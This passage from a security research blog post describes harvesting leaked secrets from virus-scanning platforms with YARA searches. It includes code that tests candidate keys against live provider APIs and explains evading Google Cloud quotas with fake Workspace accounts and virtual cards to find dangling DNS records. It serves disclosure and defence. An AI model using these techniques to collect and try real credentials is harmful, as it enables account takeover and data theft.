sizes="(min-width: 720px) 720px"></figure><p><a href="https://securitytrails.com/blog/passive-dns">Passive DNS replication data</a> is a fascinating DNS metadata source I learned about a few years ago.
Long story short, some DNS providers sell anonymized DNS data to threat intelligence services that then resell it to people like me. Anonymization means they usually don&apos;t include user identifiers (client IPs), just the DNS records themselves.</p><p>Passive DNS data has many uses. Most importantly, its diversity and scope are almost always better than enumeration alternatives like brute-forcing subdomains. If someone has resolved the DNS record, chances are that the record&apos;s metadata is available through passive DNS data. For our purposes, we can use it to find records that point at an IP or hostname we&apos;ve captured while enumerating a provider&apos;s shared pool of network identifiers.</p><p>To be clear, using passive DNS data to find dangling records is not novel, but it&apos;s a great example of the security at scale mindset in practice. We will apply this technique against modern deterrents in the implementation section.</p><h2 id="reverse-the-process-secret-scanning">Reverse the Process: Secret Scanning</h2><p>Going back to the drawing board: what unorthodox data sources would potentially contain leaked secrets? Well, secrets can be included in all sorts of files. For example, if you use a secret in your <strong>client-side</strong> application, it&apos;s not just your source code that has it: any compiled version will include it too.
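</p><p>As a toy illustration (a minimal Python sketch with a hypothetical &quot;app&quot;; the same holds for native binaries, APKs, and bundled JavaScript), compiling code does nothing to hide a string literal, which survives verbatim in the compiled artifact:</p>

```python
# Toy demo: a hardcoded secret survives compilation.
# The key below is AWS's documented *example* access key ID, not a real secret.
source = 'API_KEY = "AKIAIOSFODNN7EXAMPLE"\n'

# Compile the "app" the same way CPython does before writing a .pyc file.
code_obj = compile(source, "<app>", "exec")

# The literal sits right in the code object's constant pool.
print("AKIAIOSFODNN7EXAMPLE" in code_obj.co_consts)  # True
```

<p>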
Websites, particularly JavaScript, can use secrets to access cloud services too.</p><p><strong>Where can we find a large collection of applications, scripts, websites, and other artifacts?</strong></p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/9b8e7892185c3ff0509de3457729955c949efc06.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="931" height="781" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/9b8e7892185c3ff0509de3457729955c949efc06.png 600w, https://billdemirkapi.me/content/images/2024/09/9b8e7892185c3ff0509de3457729955c949efc06.png 931w" sizes="(min-width: 720px) 720px"></figure><p>What about&#x2026; virus scanning platforms? <em>&quot;By submitting data ... you are agreeing ... to the sharing of your Sample submission with the security community ...&quot;</em></p><p>Virus scanning websites like <a href="https://www.virustotal.com/gui/home/search">VirusTotal</a> allow you to upload &amp; inspect a file for malicious content using dozens of anti-virus software providers. They caught my eye because they have <em>everything</em>. Documents, desktop software, iOS and Android apps, text files, configuration files, etc. all frequently find their way to them. The best part? These websites often allow privileged access to these files to improve detection products, reduce false positives, and identify malware.</p><p>While we aren&apos;t after malware, we are after vulnerabilities. Virus scanning platforms are simply a means of identifying them. For example, platforms could block my access, but if a secret in some app was uploaded in a file to them, chances are that app is accessible off-platform too.</p><h3 id="scanning-samples">Scanning Samples?</h3><p>Even if we have a candidate data source, we&apos;re far from finished. It would be infeasible to scan every file on larger platforms directly.
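</p><p>A quick back-of-envelope estimate shows why. The numbers below are purely hypothetical (say a platform ingests a million new samples per day at an average of 1 MB each), but the orders of magnitude are the point:</p>

```python
# Hypothetical intake numbers, just to illustrate the scale problem.
samples_per_day = 1_000_000   # assumed platform intake rate
avg_size_mb = 1               # assumed average sample size
years = 5                     # how far back we want to search

total_samples = samples_per_day * 365 * years
total_pb = total_samples * avg_size_mb / 1_000_000_000  # MB -> PB

print(f"{total_samples:,} samples, ~{total_pb:.1f} PB of data")
```

<p>Billions of files and petabytes of data are far beyond what any individual researcher can download and scan. 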
We need to reduce scope.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/32465778dec77e8910ef52527999c6197f3648f6.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="971" height="413" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/32465778dec77e8910ef52527999c6197f3648f6.png 600w, https://billdemirkapi.me/content/images/2024/09/32465778dec77e8910ef52527999c6197f3648f6.png 971w" sizes="(min-width: 720px) 720px"></figure><p>This challenge is not exclusive to our use case. If we were looking for malware, we&apos;d run into the same feasibility problem. Fortunately, platforms that allow data access typically also provide a means of searching that data. In VirusTotal&apos;s case, this feature is called <a href="https://virustotal.readme.io/docs/retrohunt">Retrohunt</a>.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927040233.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1639" height="949" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927040233.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/Pasted-image-20240927040233.png 1000w, https://billdemirkapi.me/content/images/size/w1600/2024/09/Pasted-image-20240927040233.png 1600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927040233.png 1639w" sizes="(min-width: 720px) 720px"></figure><p>Retrohunt lets you scan files using something called &quot;YARA rules&quot;. <a href="https://yara.readthedocs.io/en/stable/index.html">YARA</a> provides a &quot;<em>rules-based approach to create descriptions of malware families based on regular expression, textual or binary patterns</em>&quot;. 
The above example from YARA&apos;s <a href="https://yara.readthedocs.io/en/stable/index.html">documentation</a> shows what these rules look like.</p><p>In the past work section, we discussed how secrets can sometimes have an identifiable pattern, like <code>AKIA</code> for AWS access keys. In fact, secret scanning tools use regexes based on these identifiers to find secrets. You know what else supports regex? YARA! While it was originally designed to &quot;identify and classify malware samples&quot;, we can repurpose it to reduce petabytes of data to &quot;just&quot; a few million files that potentially contain credentials.</p><p>Enough theory, let&apos;s write some code!</p><h1 id="technical-implementation">Technical Implementation</h1><h2 id="secret-scanning">Secret Scanning</h2><h3 id="overview">Overview</h3><p>The plan should be simple. Scan for secret patterns across several virus scanning platforms and validate potential credentials with the provider. How hard can it be? (tm)</p><p>One problem I encountered early on was that not all cloud providers use an identifiable pattern in their secrets. How are we supposed to identify candidate samples for scanning? In the overview of the security at scale mindset, note how I said the data source &quot;<em>must contain <strong>relationships</strong> indicative of the targeted vulnerability class</em>&quot;.</p><p>Just because we can&apos;t identify some secrets directly doesn&apos;t mean we can&apos;t identify potential files <em>indirectly</em>. For example, let&apos;s say I have a Python script that makes a GET request to some API endpoint using a generic <code>[a-zA-Z0-9]{32}</code> key with no identifying marks. How would I identify this file for scanning?
One relationship in the file is between the API key and the API endpoint.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927042309.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="963" height="245" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927042309.png 600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927042309.png 963w" sizes="(min-width: 720px) 720px"></figure><p><strong>While I can&apos;t search for the API key, what if I searched for the endpoint instead?</strong> The example above is a rule I wrote for <a href="https://www.linode.com/">Linode</a>, a cloud provider with generic secret keys. I can&apos;t process every sample uploaded to VirusTotal, but chances are I <em>can</em> feasibly process every sample with the string <code>api.linode.com</code>.</p><p>Generic keys are also annoying because even if we cut our scope, 32 consecutive alphanumeric characters can easily match plenty of non-secret strings too. In this project, beyond identifying <em>potential</em> secrets, I wanted accurate identification. How do we know if a generic match is a secret?
Only one way to find out: give it a go!</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927044726.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1106" height="462" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927044726.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/Pasted-image-20240927044726.png 1000w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927044726.png 1106w" sizes="(min-width: 720px) 720px"></figure><p>It would obviously be inappropriate to query customer data, but what about metadata? For example, many APIs will have benign endpoints to retrieve basic metadata like your username. We can use these authenticated endpoints as a bare-minimum validity test to meet our technical requirements without going further than we have to! These keys are already publicly leaked after all.</p><p>To review:</p><ol><li>We write YARA rules for the cloud services we&apos;re interested in, based on 1) any identifiable pattern in the secret, or 2) worst case, the API endpoint instead.</li><li>We search virus scanning platforms for these rules to identify a subset of samples with potential credential material.</li><li>We enumerate matches in each sample and test potential keys against a benign metadata endpoint to identify legitimate finds.</li></ol><h3 id="scanning-millions-of-files">Scanning Millions of Files</h3><p>Our Retrohunt jobs will produce a large number of samples that may contain secrets. Extracting strings and validating every possible key will take time and computational resources. It would be incredibly inefficient to scan hundreds of thousands of samples synchronously.
How do we build infrastructure to support our large volume?</p><p>When I first began this work in 2021, I scanned samples locally. It turned out to be incredibly impractical. I needed an approach that could maximize the number of samples we could scan in parallel without breaking the bank. What if we leveraged cloud computing?</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2024/09/benefits-of-serverless.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="717" height="379" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/benefits-of-serverless.png 600w, https://billdemirkapi.me/content/images/2024/09/benefits-of-serverless.png 717w"><figcaption>Cost Benefit Analysis of Serverless Computing by <a href="https://www.cloudflare.com/learning/serverless/what-is-serverless/">Cloudflare</a></figcaption></figure><p>A cloud execution model that has grown over the past decade is <a href="https://www.cloudflare.com/learning/serverless/what-is-serverless">serverless computing</a>. At a high level, with serverless computing, your application is only allocated and running on a cloud provider&apos;s managed infrastructure when it is needed. You don&apos;t need to worry about setting up your own server or paying for idle time. For example, you could run a web server where you only pay for the time it takes your application to respond to a request.</p><p>AWS&apos;s serverless offering is called <a href="https://aws.amazon.com/lambda/">AWS Lambda</a>. What if we created an AWS Lambda function that scans a given sample for secrets? AWS Lambda has a default concurrency limit of 1,000. This means we could scan at least 1,000 samples concurrently! As long as our scans do not take more than a few minutes, AWS Lambda is fairly cost efficient as well. I ended up using AWS Lambda, but you don&apos;t have to!
Most providers have equivalents; AWS was just where I had the most experience.</p><p>We need four major components for our secret scanning project.</p><ul><li>We need a single server responsible for coordinating VirusTotal scans and dispatching samples to our serverless environment. Let&apos;s call this the coordinator.</li><li>We need an AWS Lambda function that can scan a sample for valid secrets in a few minutes.</li><li>We need a message broker that will contain a queue of pending Retrohunt jobs and a queue of validated secrets.</li><li>We need a database to store Retrohunt scan metadata, samples we&apos;ve scanned, and any keys we find.</li></ul><p>Our coordinator and Lambda function will require details for each type of service we are targeting.</p><ul><li>The coordinator will need a YARA rule for each key type.</li><li>The Lambda function will need a method for determining if a string contains a potential key for that service and a method for validating a potential key with the backend API.</li></ul><p>When I originally started this project, tools like <a href="https://github.com/trufflesecurity/trufflehog">TruffleHog</a>, which similarly detect <strong>and validate</strong> potential keys, had not yet been created. More importantly, they weren&apos;t designed to maximize efficient scanning. With serverless, you are charged for every second of execution. We needed an optimized solution.</p><p>For the coordinator, I went with Python, but for the scanner, I went with C++. This component will download a given sample into memory, extract any ASCII or Unicode strings, and then scan these strings for secrets. For each supported provider, I implemented a class with two functions: 1) check if a string contains a potential secret key, and 2) validate a secret using a benign metadata endpoint (usually via REST). Generically, the scanner runs an internal version of <code>strings</code> and passes each string to the first function.
Any matches are tracked and asynchronously verified using the second.</p><pre><code class="language-c++">std::vector&lt;KeyMatch&gt; LinodeKeyType::FindKeys(std::string String)
{
    const std::regex linodeApiKeyRegex(&quot;(?:[^a-fA-F0-9]|^)([a-fA-F0-9]{64})(?:[^a-fA-F0-9]|$)&quot;);
    std::sregex_iterator rend;
    std::vector&lt;KeyMatch&gt; potentialKeys;
    std::smatch currentMatch;

    //
    // Find all API keys.
    //
    for (std::sregex_iterator i(String.begin(), String.end(), linodeApiKeyRegex); i != rend; ++i)
    {
        currentMatch = *i;
        if (currentMatch.size() &gt; 1 &amp;&amp; currentMatch[1].matched)
        {
            potentialKeys.push_back(KeyMatch(currentMatch[1].str(), LinodeKeyCategory::LinodeApiKey));
        }
    }

    return potentialKeys;
}

bool LinodeKeyType::ValidateKeyPair(std::vector&lt;KeyMatch&gt; KeyPair)
{
    KeyMatch apiKey;

    //
    // Retrieve the API key from the key pair.
    //
    apiKey = KeyPair[0];

    //
    // Attempt to retrieve the account&apos;s details using the API key.
    //
    HttpResponse accountResponse = WebHelper::Get(&quot;https://api.linode.com/v4/account&quot;, {}, {{&quot;Authorization&quot;, &quot;Bearer &quot; + apiKey.GetKey()}});
    if (accountResponse.GetStatusCode() == 200)
    {
        return true;
    }
    
    return false;
}
</code></pre><p>To detect secrets, I use <a href="https://github.com/intel/hyperscan">hyperscan</a>, Intel&apos;s &quot;high-performance regular expression matching library&quot;. I originally started with C++&apos;s <code>&lt;regex&gt;</code> implementation seen above, but I was shocked to find that hyperscan was faster by an order of magnitude. What took 300 seconds (e.g., scanning a large app with many strings) now took 10! Regex patterns were manually crafted based largely on public references, like that <a href="https://github.com/mazen160/secrets-patterns-db">secret pattern repository</a> we covered in Past Work.</p><p>The Coordinator, used to manage our entire architecture, was pretty straightforward. Triggered on a timer, it looks in a database for Retrohunt scans that are pending and monitors their completion. <strong>A cool trick</strong>: VirusTotal Retrohunt has a 10,000 sample limit per job. To avoid this, around ~5% into the job, you can check whether the number of matches times 20 (for 5%) is greater than or equal to 10,000. If it is, you can abort the job and dispatch two new Retrohunt jobs split by time. For example, if I&apos;m scanning the past year, I&apos;ll instead create two jobs to scan the first and second half of the year respectively. You can recursively keep splitting jobs, which was critical for secrets which lacked an identifiable pattern and thus led to many samples.</p><pre><code class="language-python"># Check if our scan reached VirusTotal&apos;s match limit.
if (scan_status == &quot;finished&quot; and scan.get_num_matched_samples() == 10000) or \
		(scan_status == &quot;running&quot; and scan.is_scan_stalled()):
	logging.warning(f&quot;Retrohunt scan {scan_id} reached match limit. Splitting and re-queueing.&quot;)

	# Calculate the mid point date for the scan.
	scan_start_time = scan.start_time
	scan_end_time = scan.end_time
	scan_mid_time = scan_start_time + (scan_end_time - scan_start_time) / 2

	# Queue the first half scan (start to mid).
	self.add_retrohunt_scan(scan.key_type_name, scan_start_time, scan_mid_time)

	# Queue the second half scan (mid to end).
	self.add_retrohunt_scan(scan.key_type_name, scan_mid_time, scan_end_time)

	logging.info(f&quot;Queued two new retrohunt scans for key type {scan.key_type_name}.&quot;)

	# If the scan is running, abort it.
	if scan_status == &quot;running&quot;:
		scan.abort_scan()
		logging.info(f&quot;Aborted running scan {scan_id} due to stall.&quot;)

	logging.info(f&quot;Marking retrohunt scan {scan_id} as aborted.&quot;)
	self.db.add_aborted_scan(scan_id)
</code></pre><p>The message broker and database are nothing special. I started with <a href="https://www.rabbitmq.com/">RabbitMQ</a> for the former, but use <a href="https://aws.amazon.com/sqs/">AWS SQS</a> today. I use MySQL for the latter.</p><p>To recap our end-to-end workflow:</p><!--kg-card-begin: markdown--><ul>
<li>The coordinator occasionally checks the database for new Retrohunt scan entries.</li>
<li>The coordinator keeps track of any pending Retrohunt scans.
<ul>
<li>Early in a scan, if we predict that the number of samples exceeds 10,000, we split the scan in two.</li>
<li>Once finished, we enumerate each sample and add it to our message broker, in turn triggering an AWS Lambda call.</li>
</ul>
</li>
<li>The AWS Lambda scanner downloads the sample and extracts ASCII/Unicode strings, calling the key type&apos;s <code>FindKeys</code> implementation.</li>
<li>Once finished, each potential match is validated using <code>ValidateKeyPair</code> in parallel.</li>
<li>Verified keys are added to the database.</li>
</ul>
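<p>The scanning steps above can be reduced to a minimal Python sketch. Everything here is a simplified stand-in for the real C++/hyperscan scanner: the helper names, the thread pool, and the toy Linode-style pattern are illustrative, not the actual implementation.</p>

```python
import re
from concurrent.futures import ThreadPoolExecutor

# Toy Linode-style pattern: a 64-character hex token with non-hex boundaries.
KEY_RE = re.compile(r"(?:[^a-fA-F0-9]|^)([a-fA-F0-9]{64})(?:[^a-fA-F0-9]|$)")
# Printable ASCII runs of 8+ characters, mimicking the `strings` utility.
STRINGS_RE = re.compile(rb"[\x20-\x7e]{8,}")

def extract_strings(sample: bytes) -> list[str]:
    """Pull printable ASCII runs out of the raw sample bytes."""
    return [m.group().decode("ascii") for m in STRINGS_RE.finditer(sample)]

def find_keys(s: str) -> list[str]:
    """FindKeys equivalent: collect candidate tokens from one string."""
    return [m.group(1) for m in KEY_RE.finditer(s)]

def scan_sample(sample: bytes, validate) -> list[str]:
    """Extract strings, dedupe candidate keys, and validate them in parallel."""
    candidates = sorted({k for s in extract_strings(sample) for k in find_keys(s)})
    with ThreadPoolExecutor() as pool:
        verdicts = list(pool.map(validate, candidates))
    return [key for key, ok in zip(candidates, verdicts) if ok]
```

<p>In the real pipeline, <code>validate</code> would call the provider&apos;s benign metadata endpoint (for Linode, the <code>/v4/account</code> route shown earlier) and report whether it returned a 200.</p>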
<!--kg-card-end: markdown--><p>This approach let me scan several million samples quickly and at a reasonable cost. While I could further optimize the C++ scanner, or the infrastructure by avoiding serverless, it would not matter enough to warrant the added complexity.</p><h2 id="dangling-domains-1">Dangling Domains</h2><p>Moving on to dangling DNS records, I was most interested in challenging modern provider mitigations. Of note, as far as I could see, attempts to enumerate Google Cloud&apos;s pool of IPs have failed because of these mitigations. There <em>has</em> been work on hijacking dangling records for managed services, <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/387796">like Google Cloud DNS</a>, just not the dedicated endpoint equivalent.</p><p>AWS also has a few mitigations, like the small pool of IPs you can access by allocating/releasing elastic IPs, but there are known ways around this. For example, instead of allocating elastic IPs, we can restart EC2 instances with ephemeral IPs to perform enumeration. On restart, you get a brand new IP.</p><p>Google Cloud was harder, but its mitigations are only deterrents. Limitations include...</p><ul><li>Like AWS, IPs are assigned from a small per-project pool. Unlike AWS, this applies project-wide. For example, trying to recreate compute instances will run into the same pool restriction (which is not true for AWS EC2).</li><li>Per project, by default, you can only have <strong>8</strong> IPs assigned at once, globally and per-region.</li><li>You can only have <strong>5</strong> projects associated with a &quot;billing account&quot;.</li><li>Billing accounts are tied to a payment method like a credit card. You can only have <strong>2</strong> billing accounts per unique credit card (before hitting fraud verification).</li><li>You can only have 10-15 projects by default per account.</li></ul><p>How do we get around these?
Well...</p><ul><li>You can attach a billing account across Google accounts.</li><li>To bypass account quotas, you can create multiple accounts using <a href="https://workspace.google.com/">Google Workspace</a>.</li><li>To bypass billing account restrictions, you can use virtual credit cards.</li></ul><p>For most quota limits, I figured the easiest way around them would be to create several accounts. The billing restrictions made this difficult, but for account creation, I ended up creating a fake Google Workspace tenant. Google Workspace is just Google products as a service for enterprises. The neat part about a Workspace is that you can programmatically create fake employee accounts, each with 10-15 projects!</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/a0baeb353819d1dc0e51aa01bbc285815e002db9.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="597" height="226"></figure><p>For the billing restrictions, I used <a href="https://privacy.com/virtual-card">virtual credit cards</a>. Long story short, services like <a href="https://privacy.com">Privacy</a> let you generate random credit card numbers with custom limits to avoid exposing your own. 
These services still follow know-your-customer (KYC) practices; my identity was verified, but they let me get past vendor-set limits tied to a single credit card number.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Blank-diagram.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="2000" height="985" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Blank-diagram.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/Blank-diagram.png 1000w, https://billdemirkapi.me/content/images/size/w1600/2024/09/Blank-diagram.png 1600w, https://billdemirkapi.me/content/images/2024/09/Blank-diagram.png 2063w" sizes="(min-width: 720px) 720px"></figure><p>By creating several accounts using Google Workspace and unique virtual cards, I was able to get past Google&apos;s deterrents. Note that I didn&apos;t abuse any vulnerability: these mitigations are just that, mitigations. With the quotas out of the way, I successfully enumerated Google&apos;s public IP pools (per-region and global) by constantly recreating <a href="https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts">forwarding rules</a>!</p><h1 id="key-findings">Key Findings</h1><h2 id="metrics">Metrics</h2><h3 id="dangling-domains-2">Dangling Domains</h3><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927114706.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="553" height="603"></figure><p>CloudRot, what I called my dangling enumeration work, enumerated the public IP pools of Google Cloud and Amazon Web Services. In total, I&apos;ve captured 1,770,495 IPs to date: 1,485,211 IPs (~84%) for AWS and 285,284 IPs (~16%) for GCP.
The difference is largely due to Google&apos;s technical mitigations.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927114753.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="714" height="524" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927114753.png 600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927114753.png 714w"></figure><p>For every 1,000 IPs in AWS&apos;s public pool, 24.73 were associated with a domain. For every 1,000 IPs in Google Cloud&apos;s public pool, 35.52 were associated with a domain.</p><p>While purely speculative, I suspect that the noticeably higher rate of impacted Google Cloud IPs reflects the fact that this is likely the first publication to successfully enumerate the public IP pool for Google Cloud&apos;s &quot;compute&quot; instances at scale. There has been research into taking over managed applications in Google Cloud, but I was unable to find any publication that enumerated IPs, likely due to the extensive technical mitigations we encountered. Since there has been a lack of research into this IP pool, it&apos;s possible that the systemic vulnerability of dangling domains has gone unnoticed.</p><p>In total, I discovered <strong>over 78,000 dangling cloud resources</strong> corresponding to <strong>66,000 unique top-level domains</strong> (excluding findings associated with dynamic DNS providers). There were thousands of notable impacted organizations like Google, Amazon, the New York Times, Harvard, MIT, Samsung, Qualys, Hewlett-Packard, etc.
Based on the <a href="https://tranco-list.eu/">Tranco ranking</a> of popular domains, CloudRot has discovered 5,434 unique dangling resources associated with a top 50,000 apex domain.</p><p>Here are a few archived examples!</p><p><strong>The New York Times</strong>: <a href="https://web.archive.org/web/20230328201322/http:/intl.prd.nytimes.com/index.html">https://web.archive.org/web/20230328201322/http://intl.prd.nytimes.com/index.html</a><br><strong>Dior</strong>: <a href="https://web.archive.org/web/20230228194202/https://preprod-elk.dior.com/">https://web.archive.org/web/20230228194202/https://preprod-elk.dior.com/</a><br><strong>State Government of California</strong>: <a href="https://web.archive.org/web/20230228162431/https:/tableau.cdt.ca.gov/">https://web.archive.org/web/20230228162431/https://tableau.cdt.ca.gov/</a><br><strong>U.S. District Court for the Western District of Texas</strong>: <a href="https://web.archive.org/web/20230226010822/https:/txwd.uscourts.gov/">https://web.archive.org/web/20230226010822/https://txwd.uscourts.gov/</a><br>Even <strong>Chuck-e-Cheese</strong>! <a href="https://web.archive.org/web/20230228033155/https:/qa.chuckecheese.com/">https://web.archive.org/web/20230228033155/https://qa.chuckecheese.com/</a></p><h3 id="hardcoded-secrets-1">Hardcoded Secrets</h3><!--kg-card-begin: markdown--><ul>
<li>Scanned over <strong>5 million</strong> unique files from various platforms.</li>
<li>Discovered over <strong>15 thousand</strong> validated secrets.
<ul>
<li>2,500+ OpenAI keys</li>
<li>2,400+ AWS keys</li>
<li>2,200+ GitHub keys</li>
<li>600+ Google Cloud Service Accounts</li>
<li>460+ Stripe live secrets</li>
</ul>
</li>
<li>Breakdown of metadata
<ul>
<li>~36% of keys were embedded in the context of an Android application.</li>
<li>~12% of keys were embedded in an ELF executable, but these were often bundled in an Android app.</li>
<li>~8.7% of keys were found in HTML.</li>
<li>~7.9% of keys were embedded in a Windows Portable Executable.</li>
<li>~5.7% of keys were found in a regular text file.</li>
<li>~4.8% of keys were found in a JSON file.</li>
<li>~4.7% of keys were found in a dedicated JavaScript file.</li>
<li>And so on...</li>
</ul>
</li>
<li>Breakdown of country of origin
<ul>
<li>~3.7% of files with keys were uploaded from the United States</li>
<li>~2.3% from India</li>
<li>~1.7% from Russia</li>
<li>~1.4% from Brazil</li>
<li>~1.1% from Germany</li>
<li>~0.9% from Vietnam</li>
<li>And so on...</li>
</ul>
</li>
</ul>
<!--kg-card-end: markdown--><h2 id="case-studies">Case Studies</h2><h3 id="samsung-bixby">Samsung Bixby</h3><p>One of the first keys I encountered was for Samsung Bixby&apos;s Slack environment.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/image-1.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1127" height="385" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/image-1.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/image-1.png 1000w, https://billdemirkapi.me/content/images/2024/09/image-1.png 1127w" sizes="(min-width: 720px) 720px"></figure><p>Long story short, the <code>com.samsung.android.bixby.agent</code> app has a &quot;logcat&quot; mechanism to upload the agent&apos;s log file to a dedicated Slack channel. It does this using the Slack REST API and a bot token for <code>dumpstater</code>.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927120547.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="567" height="572"></figure><p>The vulnerability was that the bot had a default bot scope, which an attacker could abuse to read from or write to every channel in Samsung&apos;s Slack!</p><h3 id="crowdstrike">CrowdStrike</h3><p>Another early example involves CrowdStrike! An old version of a free utility CrowdStrike distributes on <code>crowdstrike.com</code>, <a href="https://www.crowdstrike.com/resources/community-tools/crowdinspect-tool/">CrowdInspect</a>, contained a hardcoded API key for the VirusTotal service.
The API key granted full access to both the VirusTotal account of a CrowdStrike employee and the broader CrowdStrike organization inside of VirusTotal.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927121236.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="630" height="265" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927121236.png 600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927121236.png 630w"></figure><p>An attacker could use this API key to leak information about ongoing CrowdStrike investigations and to gain significant premium access to VirusTotal, such as the ability to download samples, access to VirusTotal&apos;s intelligence hunting service, access to VirusTotal&apos;s private API, etc. For a full list of privileges, you can use the <a href="https://developers.virustotal.com/reference/user">user API endpoint</a>.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927121344.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1087" height="839" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927121344.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/Pasted-image-20240927121344.png 1000w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927121344.png 1087w" sizes="(min-width: 720px) 720px"></figure><p>As an example of how this key could be abused to gain confidential information about ongoing CrowdStrike investigations, I queried the <a href="https://developers.virustotal.com/reference/graphs">VirusTotal Graphs API</a> with the filter <code>group:crowdstrike</code>. 
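A query like that can be sketched against VirusTotal's v3 REST API. The endpoint and `filter` parameter come from VirusTotal's public Graphs documentation (linked above); the function names and structure below are my own illustration, not the tooling I actually used:

```python
import json
import urllib.parse
import urllib.request

def build_graphs_url(group: str, limit: int = 10) -> str:
    """VirusTotal v3 graph search, filtered to one organization's graphs."""
    query = urllib.parse.urlencode({"filter": f"group:{group}", "limit": limit})
    return f"https://www.virustotal.com/api/v3/graphs?{query}"

def list_graphs(api_key: str, group: str) -> list:
    """Fetch the graphs visible to this key (requires a valid x-apikey)."""
    req = urllib.request.Request(
        build_graphs_url(group), headers={"x-apikey": api_key}
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)["data"]

print(build_graphs_url("crowdstrike"))
# → https://www.virustotal.com/api/v3/graphs?filter=group%3Acrowdstrike&limit=10
```

Because the key belonged to the whole organization, every graph CrowdStrike defenders were working on came back from a single call like this.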
VirusTotal offers Graphs as a feature which allows defenders to graph out relationships between files, links, and other entities in one place. For example, a defender could use VirusTotal graphs to document the different binaries seen from a specific APT group, including the C2 servers those binaries connect to. Since our API key has full access to the CrowdStrike organization, we can query the active graphs defenders are working on and even see the content of these graphs.</p><p>Obviously, this was quickly reported and got fixed in under 24 hours!</p><h3 id="supreme-court-of-nebraska">Supreme Court of Nebraska</h3><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927121956.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="840" height="345" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927121956.png 600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927121956.png 840w" sizes="(min-width: 720px) 720px"></figure><p>This was a fun one. At the end of 2022, I found an interesting CSV export of an employee of Nebraska&apos;s Supreme Court with over 300 unique credentials including...</p><ul><li>Credentials for internal infrastructure</li><li>Credentials for security tooling</li><li>Credentials for mobile device management</li><li>Credentials for VPN access (OpenVPN)</li><li>Credentials for cloud infrastructure</li><li>Unredacted credit card information</li><li>And much more...</li></ul><p>These were seriously the keys to the kingdom and then some. While metadata showed the file was uploaded in Lincoln, Nebraska, by a web user, it&apos;s unclear whether this was an accident or an automated tool. 
